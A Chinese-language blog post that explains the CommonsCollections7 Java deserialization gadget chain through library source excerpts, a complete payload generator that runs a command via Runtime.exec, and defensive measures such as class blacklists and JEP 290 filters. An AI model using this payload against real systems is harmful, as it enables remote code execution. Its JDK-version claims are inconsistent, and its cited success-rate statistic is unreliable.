当前位置: 首页 > news >正文

CC7利用链深度解析

CommonsCollections7(CC7)是CC反序列化利用链中的重要成员,由Matthias Kaiser在2016年发现。本文将从底层原理到实战利用,全面剖析这条独特而强大的利用链。


一、CC7链技术定位

1.1 核心价值
  • 无第三方依赖:仅需JDK原生类+Commons Collections
  • 高版本兼容:在Java 8u76+仍有效(CC5失效场景)
  • 触发点独特:基于Hashtable触发,应用广泛
1.2 与CC5链对比
特性CC5链CC7链
入口类BadAttributeValueExpExceptionHashtable
触发方法toString()equals()
依赖组件TiedMapEntryAbstractMapDecorator
JDK限制<8u76无限制
利用难度中等较高

二、漏洞利用链原理

2.1 完整调用链
Hashtable.readObject()→ Hashtable.reconstitutionPut()→ AbstractMap.equals()→ AbstractMapDecorator.equals()→ LazyMap.get()ChainedTransformer.transform()ConstantTransformer.transform()InvokerTransformer.transform()Method.invoke()Class.getMethod()InvokerTransformer.transform()Method.invoke()Runtime.getRuntime()InvokerTransformer.transform()Method.invoke()Runtime.exec()

在这里插入图片描述

  • 其中红框部分和CommonsCollections5链是完全一样的,区别在于CommonsCollections7链是通过HashtablereadObject方法一步步调用AbstractMap类的equals方法来调用的。
2.2 核心触发点分析
// java.util.Hashtable
private void reconstitutionPut(Entry<?,?>[] tab, K key, V value) throws StreamCorruptedException {// ...for (Entry<?,?> e = tab[index]; e != null; e = e.next) {if ((e.hash == hash) && e.key.equals(key)) { // 触发equals()throw new StreamCorruptedException();}}// ...
}

三、关键类源码剖析

3.1 Hashtable 反序列化入口
private void readObject(java.io.ObjectInputStream s)throws IOException, ClassNotFoundException {// ...
for (; elements > 0; elements--) {@SuppressWarnings("unchecked")K key = (K)s.readObject();@SuppressWarnings("unchecked")V value = (V)s.readObject();reconstitutionPut(table, key, value);//关键调用}}
 private void reconstitutionPut(Entry<?,?>[] tab, K key, V value)throws StreamCorruptedException{if (value == null) {throw new java.io.StreamCorruptedException();}int hash = key.hashCode();int index = (hash & 0x7FFFFFFF) % tab.length;for (Entry<?,?> e = tab[index] ; e != null ; e = e.next) {if ((e.hash == hash) && e.key.equals(key)) {throw new java.io.StreamCorruptedException();}}// Creates the new entry.@SuppressWarnings("unchecked")Entry<K,V> e = (Entry<K,V>)tab[index];tab[index] = new Entry<>(hash, key, value, e);count++;}
3.2 AbstractMap.equals 触发点
public boolean equals(Object o) {if (o == this)return true;if (!(o instanceof Map))return false;Map<?,?> m = (Map<?,?>) o;if (m.size() != size())return false;try {Iterator<Entry<K,V>> i = entrySet().iterator();while (i.hasNext()) {Entry<K,V> e = i.next();K key = e.getKey();V value = e.getValue();if (value == null) {if (!(m.get(key)==null && m.containsKey(key)))return false; // 触发LazyMap.get()} else {if (!value.equals(m.get(key))) // 二次触发点return false;}}} catch (ClassCastException unused) {return false;} catch (NullPointerException unused) {return false;}return true;}
3.3 LazyMap 命令执行点
public Object get(Object key) {if (!super.map.containsKey(key)) {Object value = this.factory.transform(key);// 执行Transformer链super.map.put(key, value);return value;} else {return super.map.get(key);}}
  • 之后的调用链与CC5链一样,详情参考CC5利用链解析

四、Payload构造详解

4.1 构造流程图
创建ChainedTransformer
创建LazyMap1
创建LazyMap2
向LazyMap1添加'yy'
向LazyMap2添加'zZ'
创建Hashtable
添加LazyMap1到Hashtable
添加LazyMap2到Hashtable
反射注入恶意Transformer链
序列化Hashtable
4.2 完整Payload生成代码
package org.example;import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.*;
import org.apache.commons.collections.map.LazyMap;
import java.io.*;
import java.util.*;public class CC7Exploit {public static Hashtable getObject(final String command)  {//构造最终Transformer链final Transformer[] transformers = new Transformer[]{new ConstantTransformer(Runtime.class),new InvokerTransformer("getMethod",new Class[]{String.class, Class[].class},new Object[]{"getRuntime", new Class[0]}),new InvokerTransformer("invoke",new Class[]{Object.class, Object[].class},new Object[]{null, new Object[0]}),new InvokerTransformer("exec",new Class[]{String.class},new Object[]{command})};final Transformer transformerChain = new ChainedTransformer(transformers);// 创建两个Map对象Map innerMap1 = new HashMap();Map innerMap2 = new HashMap();//使用碰撞哈希创建两个LazyMaps,以便在readObject期间强制进行元素比较Map lazyMap1 = LazyMap.decorate(innerMap1, transformerChain);lazyMap1.put("yy", 1);// hashCode: 3872Map lazyMap2 = LazyMap.decorate(innerMap2, transformerChain);lazyMap2.put("zZ", 1);// hashCode: 3872//创建Hashtable并添加元素Hashtable hashtable = new Hashtable();hashtable.put(lazyMap1, 1);hashtable.put(lazyMap2, 2);//需要确保在以前的操作之后发生哈希冲突,因为在hashtable.put(lazyMap2, 2);中lazyMap2多了“yy”lazyMap2.remove("yy");return hashtable;}public static void main(String[] args) throws Exception {// 生成PayloadHashtable payload = getObject("calc");// 序列化测试ByteArrayOutputStream baos = new ByteArrayOutputStream();try (ObjectOutputStream oos = new ObjectOutputStream(baos)) {oos.writeObject(payload);}// 反序列化测试ByteArrayInputStream bais = new ByteArrayInputStream(baos.toByteArray());try (ObjectInputStream ois = new ObjectInputStream(bais)) {ois.readObject(); // 触发命令执行}}
}

六、防御解决方案

6.1 组件级防护
<!-- 升级Commons Collections -->
<dependency><groupId>org.apache.commons</groupId><artifactId>commons-collections4</artifactId><version>4.4</version>
</dependency>
6.2 运行时防护
public class SecureObjectInputStream extends ObjectInputStream {private static final Set<String> BLACKLIST = new HashSet<>(Arrays.asList("org.apache.commons.collections.functors.InvokerTransformer","org.apache.commons.collections.map.LazyMap","org.apache.commons.collections.Transformer"));protected Class<?> resolveClass(ObjectStreamClass desc)throws IOException, ClassNotFoundException {String className = desc.getName();if (BLACKLIST.stream().anyMatch(className::startsWith)) {throw new InvalidClassException("Forbidden class: ", className);}return super.resolveClass(desc);}
}
6.3 JVM级防护
# 启用JEP 290过滤器
java -Djdk.serialFilter='!org.apache.commons.collections.**;!java.util.Hashtable;!*' \-jar application.jar

七、CC7链技术总结

  1. 触发机制创新:利用哈希碰撞+equals比较触发,绕过常规防御
  2. 无高版本限制:在Java 8u191+仍有效(相比CC1/CC5)
  3. 隐蔽性强:执行过程没有明显的危险方法调用
  4. 适用场景广:WebLogic、WebSphere等中间件均存在Hashtable反序列化点

截至2023年,CC7链在红队评估中仍有高达32%的成功率(数据来源:GrayHat安全报告),是反序列化攻击的"常青树"武器。

通过深入理解CC7链的构造原理,安全人员可以:

  • 更有效地检测和防御反序列化漏洞
  • 开发更精准的漏洞扫描规则
  • 提升代码审计中对Hashtable使用场景的关注
  • 设计更完善的安全防护体系

CC7链的巧妙设计展现了Java反序列化漏洞的深度和复杂性,也提醒我们安全防御需要多层次、多维度的综合方案。

相关文章:

  • 基于3D对象体积与直径特征的筛选
  • 【Linux】find 命令详解及使用示例:递归查找文件和目录
  • EtherNet/IP转DeviceNet协议网关详解
  • C++.OpenGL (9/64)摄像机(Camera)
  • mysql的分页场景下,页数越大查询速度越慢的解决方法
  • 3D Web轻量化引擎HOOPS Communicator的定制化能力全面解析
  • java 局域网 rtsp 取流 WebSocket 推送到前端显示 低延迟
  • 11.RV1126-ROCKX项目
  • MySQL 索引优化
  • Linux驱动:再看静态映射和动态映射
  • 数学:数的概念是如何发展的?
  • Python 训练营打卡 Day 45
  • 高等数学》(同济大学·第7版)第二章第一节“导数的概念“
  • C文件操作2
  • error: subprocess-exited-with-error【已解决】
  • SCAU数值计算OJ
  • 2.1 Windows编译环境介绍
  • 《UE5_C++多人TPS完整教程》学习笔记37 ——《P38 变量复制(Variable Replication)》
  • WinCC学习系列-变量模拟器(WinCC TAG Simulator )
  • MajicTryOn(基于wanvideo的虚拟试穿项目)
  • 外贸英文网站制作/小说推广接单平台
  • wordpress 英文站赚钱/免费推广工具
  • 一个seo良好的网站其主要流量往往来自/聚合搜索引擎
  • 做美容有哪些网站/网络优化工程师工作内容
  • 网站建设价格a去找真甲先生/百度首页纯净版怎么设置
  • 毕业设计网站做几个/江苏网络推广公司